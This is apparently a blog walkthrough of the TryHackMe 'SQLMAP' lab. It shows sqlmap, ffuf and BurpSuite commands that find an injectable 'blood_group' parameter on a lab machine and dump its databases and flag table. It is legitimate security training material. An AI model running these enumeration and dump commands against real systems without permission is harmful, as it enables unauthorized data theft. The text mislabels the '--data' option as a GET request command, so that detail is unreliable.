SQLMAP Room: A TryHackMe 101 Walkthrough
Introduction:
In the world of ethical hacking and penetration testing, SQL injection vulnerabilities persist as a significant threat. Addressing this challenge head-on, SQLMap emerges as a formidable tool designed to exploit and identify vulnerabilities in web applications susceptible to SQL injection. In this article, we’ll unravel the fundamentals of SQLMap, covering its installation process and versatile applications, and embark on a practical journey through a TryHackMe room named “SQLMAP.” This hands-on experience will enhance our proficiency in securing web applications.
What is SQLMap?
SQLMAP is an automated penetration testing tool that detects and exploits SQL injection vulnerabilities. Developed in Python, SQLMAP makes it easier for ethical hackers and security professionals to identify and exploit SQL injection flaws in web applications. It provides a wide array of features, allowing users to retrieve database information, access and modify data, and even execute commands on the underlying operating system.
How to Install SQLMAP:
Installing SQLMAP is a straightforward process. The tool is compatible with various operating systems, including Windows, Linux, and macOS. Here are the general steps to install SQLMAP:
Clone SQLMAP Repository:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-devEssential SQLMap Commands:
Here are some common and frequently used SQLMAP commands with explanations
1. Basic Scan Command:
sqlmap -u <target-url>- Explanation: Initiates a basic SQL injection scan on the specified target URL.
2. GET Request Command:
sqlmap -u <target-url> --data "<post-data>"- Explanation: Used when dealing with a form that uses the HTTP GET method.
3. Database Enumeration Command:
sqlmap -u <target-url> --dbs- Explanation: Lists available databases on the target.
4. Table Enumeration Command:
sqlmap -u <target-url> -D <database-name> --tables- Explanation: Lists tables within a specified database.
5. Column Enumeration Command:
sqlmap -u <target-url> -D <database-name> -T <table-name> --columns- Explanation: Lists columns within a specified table.
6. Dump Data Command:
sqlmap -u <target-url> -D <database-name> -T <table-name> -C <column-name> --dump- Explanation: Dumps the data from the specified column in the specified table.
TryHackMe Room Toolkit: FFUF, BurpSuite, SQLMap Trio:
Now armed with essential SQLMap knowledge, let’s seamlessly transition to the TryHackMe room. In this space, our toolkit features three critical tools:
- FFUF for Directory Busting: Using FFUF to find hidden paths and potential entry points within the web application, ensuring a thorough exploration of its structure.
- BurpSuite for Request Capture: Utilize BurpSuite to intercept and scrutinize HTTP requests, gaining insights into the application’s communication and pinpointing potential vulnerabilities for future exploitation.
- SQLMap for Identifying and Exploiting SQL Vulnerabilities: Our cornerstone tool, SQLMap, takes center stage, automating the identification of SQL injection vulnerabilities. Use it to extract data, manipulate databases, and understand the impact of SQL flaws.
With this strategic trio of FFUF, BurpSuite, and SQLMap, we aim to uncover vulnerabilities and deepen our skills in ethical hacking and penetration testing. Let’s step into the TryHackMe room and put these tools to work.
SQLMAP Challange From TryHackMe Room:
In this walkthrough, we will exclusively focus on Part 3 of the TryHackMe room “SQLMAP” as Parts 1 and 2 are self-explanatory. Now, the real fun begins as we tackle the challenge of exploiting SQL vulnerabilities, armed with our trusty tools: FFUF, BurpSuite, and SQLMap. Let’s dive in and start cracking.
Our Task:
Exploit a SQL Injection vulnerability in the deployed ‘Blood Donations’ application to uncover the flag. The application appears to have a security flaw that allows unauthorized access, and your goal is to leverage SQL Injection techniques to gain access and retrieve the flag.
Step 1: Connecting With TryHackMe VPN
Before starting, ensure your Try Hack Me VPN is connected and working. If you need assistance with a VPN connection, refer to this article.
Step 2: Launch the Machine
Start the machine provided in the room and let it run for 3–4 minutes before proceeding, a box will appear like below indicating that the machine is working and you will have the IP Address of the newly deployed machine.
Step 3: Ping the Machine
Ensure the machine is responsive by pinging it using the terminal of your Kali Linux machine.
Use the command: ping <Machine_IP>.
example:-
ping 10.10.123.134If successful, proceed to the next step.
Step 4: Discovering Hidden Paths with FFUF
Upon accessing the MachineIP address “http://10.10.123.134" in a web browser, the displayed page reveals limited information. To extract additional insights, we use ffuf to systematically uncover hidden paths, utilizing the rockyou.txt wordlist for comprehensive exploration. This approach ensures a thorough examination, allowing us to identify obscured pathways within the web application.
Command :
ffuf -u http://10.10.123.134/FUZZ -w /usr/share/wordlists/rockyou.txt
As you can see we found the following hidden paths by using ffuf, and if we load “http://10.10.123.134/blood" in our web browser, we find this webpage let's investigate further in the next step.
Step 5: Analyzing the request in BurpSuite
On the newly discovered page, there’s a button labeled “Search.” When we click it, we observe that some information is sent in a Post request using BurpSuite. We capture and store this information in a file named “req.txt.” If we closely examine the request, we identify a potentially vulnerable parameter named “blood_group.” In the subsequent steps, we will exploit this vulnerability for further analysis.
Step 6: Finding the Current Database User Using SQLMAP
We can find the Current Database User by using the following command of SQLMAP
Command:
sqlmap -r req.txt -p blood_group --current-userStep 7: Finding All The Databases Using SQLMAP
Utilizing the vulnerable parameter identified in the previous step, we can extract a comprehensive list of all databases through the application of SQLMAP. The command for this operation is as follows:
Command:
sqlmap -r req.txt -p blood_group --dbsIn executing the aforementioned command, we successfully identified the “blood” database. Subsequent steps will involve a thorough exploration of this database to uncover the final flag.
Step 8: Finding All The Tables in the Blood Database Using SQLMAP
Following the discovery of the blood database in the previous step, our next course of action involves a more in-depth investigation. To enumerate all tables within the database, we use SQLMAP with the following command.
Command:
sqlmap -r req.txt -p blood_group -D blood --tablesStep 9: Dumping the Data and Finding the Final Flag
To uncover the final flag, we utilize the following SQLMAP command:
sqlmap -r req.txt -p blood_group -D blood -T flag --dumpExecuting this command enables the extraction of the final flag, thereby concluding the room exploration process.
Conclusion:
In summary, our exploration began by using ffuf to uncover hidden paths in the web application. We then identified a potential vulnerability, “blood_group,” by analyzing a Post request triggered by a “Search” button using BurpSuite. Exploiting this vulnerability with SQLMAP, we discovered the “blood” database. Further investigation revealed the current database user. Finally, we retrieved the ultimate goal, the final flag, using a targeted SQLMAP command based on the acquired knowledge. This systematic approach showcased the importance of careful analysis and specialized tools, including ffuf, BurpSuite, and SQLMAP, in penetration testing scenarios.
If you’re keen on more of these adventures, hit that follow button for future articles — we’re just getting started!
